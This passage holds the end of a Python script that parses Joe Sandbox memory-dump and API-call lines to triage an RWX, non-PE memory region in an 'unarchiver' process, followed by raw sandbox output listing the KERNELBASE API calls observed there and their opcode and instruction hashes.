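                 "00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false")
SAMPLE_API_LINES = [
    "• GetTempPathW.KERNELBASE(?,00000E24,?,?), ref: 00E0A5B6",
    "• SetFilePointer.KERNELBASE(?,00000E24,737D8511,00000000,00000000,00000000,00000000), ref: 00E0A8DE",
    "• ReadFile.KERNELBASE(?,00000E24,737D8511,00000000,00000000,00000000,00000000), ref: 00E0A9C1",
    "• CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 00E0A67D",
    "• GetFileType.KERNELBASE(?,00000E24,737D8511,00000000,00000000,00000000,00000000), ref: 00E0A815",
    "• CreatePipe.KERNELBASE(?,00000E24,?,?), ref: 00E0AC36",
    "• CreateDirectoryW.KERNELBASE(?,?), ref: 00E0AA8B",
]


def triage_sample() -> dict:
    return triage(parse_source(SAMPLE_SOURCE), [parse_api(l) for l in SAMPLE_API_LINES])


if __name__ == "__main__":
    for key, value in triage_sample().items():
        print(f"{key}: {value}")
```

Running the script reports the region as RWX, private and not PE-backed, with every call site above the region base, and lists the APIs by address: GetTempPathW, CreateFileW, GetFileType, SetFilePointer, ReadFile, CreateDirectoryW, CreatePipe. The ordering is by call-site address, not by execution order; for the latter, the per-function graphs above have to be read together with the process's API trace.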

APIs
• CreateDirectoryW.KERNELBASE(?,?), ref: 00E0AA8B
Memory Dump Source
• Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
Similarity
• API ID: CreateDirectory
• String ID:
• API String ID: 4241100979-0
• Opcode ID: 5efb276e20ef4c552cf935ad815b3fae4ab367d8bb3deaf83b9977f8c45a5699
• Instruction ID: 109926006f24c2582a256318a981983c545dda23ad2716aa6cb4adbf1dadf8f1
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5efb276e20ef4c552cf935ad815b3fae4ab367d8bb3deaf83b9977f8c45a5699
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D621B0716083C45FDB12CB29DC55B92BFE8AF06314F0D84EAE884DF193E224D949CB61
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RegQueryValueExW.KERNELBASE(?,00000E24,737D8511,00000000,00000000,00000000,00000000), ref: 00E0A40C
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: QueryValue
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3660427363-0
                                                                                                                                                                                                                                                            • Opcode ID: 545a5bf16a5370bc6c88a7e6aadd71d866ec5fee11a79d84bab3897fa7b18fdb
                                                                                                                                                                                                                                                            • Instruction ID: b9e42d2146ee3ab75677878004ec8e1c1602ebd742c07ebd2cb57bd8517c4f5e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 545a5bf16a5370bc6c88a7e6aadd71d866ec5fee11a79d84bab3897fa7b18fdb
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 16219075600308AFE720CF25CC85FA6F7ECEF04714F08846AE9459B291D774E949CA72
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • ReadFile.KERNELBASE(?,00000E24,737D8511,00000000,00000000,00000000,00000000), ref: 00E0A9C1
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileRead
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                                                                                                                                            • Opcode ID: 7d8ce985e58fcd10ad1e77d4be9e8bcade0458c3d7cf16ca3f281e0569763ef7
                                                                                                                                                                                                                                                            • Instruction ID: f34a1f6402bb7254b0dd83d6fd20f18055e6fb4369baebbe937ea27fc5bb7899
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7d8ce985e58fcd10ad1e77d4be9e8bcade0458c3d7cf16ca3f281e0569763ef7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2F11C871500304AFEB21CF61DC85FA6F7E8EF44324F08846AEA459B191C374A544CBB6
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SetFilePointer.KERNELBASE(?,00000E24,737D8511,00000000,00000000,00000000,00000000), ref: 00E0A8DE
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FilePointer
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 973152223-0
                                                                                                                                                                                                                                                            • Opcode ID: eaef6355b913a4599c431efc4bcfae52a62f06cc13b1a694435c764111bf29a2
                                                                                                                                                                                                                                                            • Instruction ID: a126c54e82a3f736dd7918d08b87732cb0545c2d7de5b3fc75e81afc59c3121f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eaef6355b913a4599c431efc4bcfae52a62f06cc13b1a694435c764111bf29a2
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B311C471500308AFEB21DF64DC85BA6F7E8EF44324F18846AE9459B181C374A544CBB6
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SetErrorMode.KERNELBASE(?), ref: 00E0A30C
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorMode
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2340568224-0
                                                                                                                                                                                                                                                            • Opcode ID: d49a42efcdaeaa4aa717cd22ce54f3d859dec9a50754dd878d1fc7692ae811c4
                                                                                                                                                                                                                                                            • Instruction ID: 073faa687fdb0101740414c077d133608b3fa5c6fc3a2c2d1aa5a0f8cc9c125b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d49a42efcdaeaa4aa717cd22ce54f3d859dec9a50754dd878d1fc7692ae811c4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B21194754093C45FD7228B25DC54A52BFB4DF17224F0D80DBDD858F163D265A848CB72
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetFileType.KERNELBASE(?,00000E24,737D8511,00000000,00000000,00000000,00000000), ref: 00E0A815
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileType
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3081899298-0
                                                                                                                                                                                                                                                            • Opcode ID: 01d8e2bdb47ac63b012d7f9ca8d129689dd48128d873fd1e5d5b46ddf40fb632
                                                                                                                                                                                                                                                            • Instruction ID: 105587af1bb239432254ece6a6604aa4b4e2420c98b3d672c97821c7381f3937
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 01d8e2bdb47ac63b012d7f9ca8d129689dd48128d873fd1e5d5b46ddf40fb632
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4901D671500308AFE720DB11DC85BA6F7D8DF04724F18C0AAEE059F281D778A944CAB6
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNELBASE(?,?), ref: 00E0AA8B
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreateDirectory
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 4241100979-0
                                                                                                                                                                                                                                                            • Opcode ID: 3a87098e176ad6198d5e21de62dedf19f0ad8717e277d19ab7b801350954ebba
                                                                                                                                                                                                                                                            • Instruction ID: b3a801e20bdd7c5b26c85bbb17032a594ebb2ad1830e985f8a108e558612427d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a87098e176ad6198d5e21de62dedf19f0ad8717e277d19ab7b801350954ebba
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A31130716002449FEB10CF65D985766BBE8AF04324F0C84BAED49DB281E774D944CB62
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetSystemInfo.KERNELBASE(?), ref: 00E0B208
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: InfoSystem
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 31276548-0
                                                                                                                                                                                                                                                            • Opcode ID: fb17d4b29e4e7b66e7e7080bf9fa3718dcdb19f78655902e11ca0e71ba8f0dfb
                                                                                                                                                                                                                                                            • Instruction ID: b02a5c4ced7a39624ae69792f518dbac871ce6b6913ebe50bab77763922bc1ce
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fb17d4b29e4e7b66e7e7080bf9fa3718dcdb19f78655902e11ca0e71ba8f0dfb
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CB117071509380AFDB128F15DC84B56BFA4EF46224F0884EAED859F253D275A948CB72
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CloseFind
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1863332320-0
                                                                                                                                                                                                                                                            • Opcode ID: bfb331691cf1032b7945864058c4adf52ea8ac30bece53b3c0594bcf4af2f840
                                                                                                                                                                                                                                                            • Instruction ID: c46a0916985b12638c4977dab4695197c66de5dab593a344088605392ec3c762
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bfb331691cf1032b7945864058c4adf52ea8ac30bece53b3c0594bcf4af2f840
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 631170755093C4AFDB128B25DC85B52BFF4EF06320F0984DAED858F2A3D365A848DB61
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CreatePipe.KERNELBASE(?,00000E24,?,?), ref: 00E0AC36
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreatePipe
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2719314638-0
                                                                                                                                                                                                                                                            • Opcode ID: bf8700a905573707709a676828cf352cdf2d4e2afbee8dd0034825cc37de9836
                                                                                                                                                                                                                                                            • Instruction ID: 8f0323342c2c166f8c69a86906186099f03b733aad21a85ea3efdf42009357f0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bf8700a905573707709a676828cf352cdf2d4e2afbee8dd0034825cc37de9836
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7B017171600200AFD750DF16DC86B26FBE8FB88A20F18856AED489B741D735B915CBE5
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FindNextFileW.KERNELBASE(?,00000E24,?,?), ref: 00E0A1C2
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileFindNext
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2029273394-0
                                                                                                                                                                                                                                                            • Opcode ID: 5be433546f0190b0b8fa3ab449872f93ad4a9cec12c306a596c6ad32a72eb552
                                                                                                                                                                                                                                                            • Instruction ID: 8f0bcd952f1a9d977ed38b07555f010e589b213716797af76496b99e834d3f4c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5be433546f0190b0b8fa3ab449872f93ad4a9cec12c306a596c6ad32a72eb552
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 00017171600200AFD710DF16DC86B26FBE8FB88A20F18856AED489B741D735B915CBE5
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetTempPathW.KERNELBASE(?,00000E24,?,?), ref: 00E0A5B6
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: PathTemp
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2920410445-0
                                                                                                                                                                                                                                                            • Opcode ID: 370dc3cdfd82d922a2a1f04a2420878fe4fd9dee4628e7f2f55959946a5c876a
                                                                                                                                                                                                                                                            • Instruction ID: 41310389c48ed53418f3c544649004c10884c97b2d1a240be1960a5ba663bbaa
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 370dc3cdfd82d922a2a1f04a2420878fe4fd9dee4628e7f2f55959946a5c876a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE01D671600200AFD710DF16CC86B26FBE8FB88A20F188159EC085B741D735F915CBE5
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CloseFind
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1863332320-0
                                                                                                                                                                                                                                                            • Opcode ID: 76a7b3b75db2a1ddfe6f83faee2fc8b726da3e14f41667229130abca22ccfe81
                                                                                                                                                                                                                                                            • Instruction ID: 5b461011bcba7e4883fcbfa1142cb0a14637afe3bf0a732541314159a83dc594
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 76a7b3b75db2a1ddfe6f83faee2fc8b726da3e14f41667229130abca22ccfe81
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7001D1746002449FDB108F25D8857A2FBD4EF04324F08C0AADD459F292D779E888DEA2
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SetErrorMode.KERNELBASE(?), ref: 00E0A30C
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorMode
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2340568224-0
                                                                                                                                                                                                                                                            • Opcode ID: e928339c6fc5c6a516a79967dee95feb4bf33855c5a0e2f7bf1d42b051e00f65
                                                                                                                                                                                                                                                            • Instruction ID: d8cd4d92db163d2498be3421dfc6d196d3c1a6994b4bf8bc713b9e43c83e404f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e928339c6fc5c6a516a79967dee95feb4bf33855c5a0e2f7bf1d42b051e00f65
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 62F08C345043489FDB208F15D8857A5FBE0EF04725F08C0AADD495F292D379A888DAA2
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CloseHandle.KERNELBASE(?), ref: 00E0A748
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2962429428-0
                                                                                                                                                                                                                                                            • Opcode ID: 0d77682b63a979a96d1ebbd82a44a8783fe66606fb13e07dd922dc1f7b04e4df
                                                                                                                                                                                                                                                            • Instruction ID: b7cd16add03e00beb6f601b768c1e25d9b2f24073723385f40f26c6c4a922a0b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0d77682b63a979a96d1ebbd82a44a8783fe66606fb13e07dd922dc1f7b04e4df
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 67219FB55097C09FDB128B25DC94792BFB8EF06320F0984EBDC858B5A3D2249909C772
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CloseHandle.KERNELBASE(?), ref: 00E0A748
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F6E0CD7014D344CFDB12837598746993F635BD1204F4581DDD045CF593D524E955D791
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599478581.0000000000E02000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E02000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e02000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 6a55fd9270f126372626d5331a11aa7b0cb00072c6c1a29dfc053abcdb039757
                                                                                                                                                                                                                                                            • Instruction ID: fd59e0c210eaed9b503ad86e10bb4d0a3bc6050267c53dc005b738b7a9b9d636
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6a55fd9270f126372626d5331a11aa7b0cb00072c6c1a29dfc053abcdb039757
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3DD05E792056914FD3169A1CC1A9B963BD4AB51718F4A44FDAC008B7A3C768D9C1E610
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599478581.0000000000E02000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E02000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e02000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: ca9a0d9a20c8913d61df8e5fd7ac21b1be1a869d8c60975c3f1bdc9d38af238b
                                                                                                                                                                                                                                                            • Instruction ID: cc61d7d637552abdfec83163b59de0068ce7e72dc66113bfb8fed0d36fa69568
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ca9a0d9a20c8913d61df8e5fd7ac21b1be1a869d8c60975c3f1bdc9d38af238b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 69D05E342002824BCB15DA1CD6D9F5933D8AB40718F0644ECAC108B2A6C7BCD8C0CA00
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3600800592.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_4cc0000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: e3df412c7391cafe42925ad5e9f3f9db37097e04e9e1bc4608f82b6924d86033
                                                                                                                                                                                                                                                            • Instruction ID: fb4087a8b1a76975e15087059e95d68ff88591b86fe0fc594855e0753693a5bc
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e3df412c7391cafe42925ad5e9f3f9db37097e04e9e1bc4608f82b6924d86033
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C6C01230244204CBD704A7A9D459A2573975BD0308F45C468D4090B255CA70FC81E6C0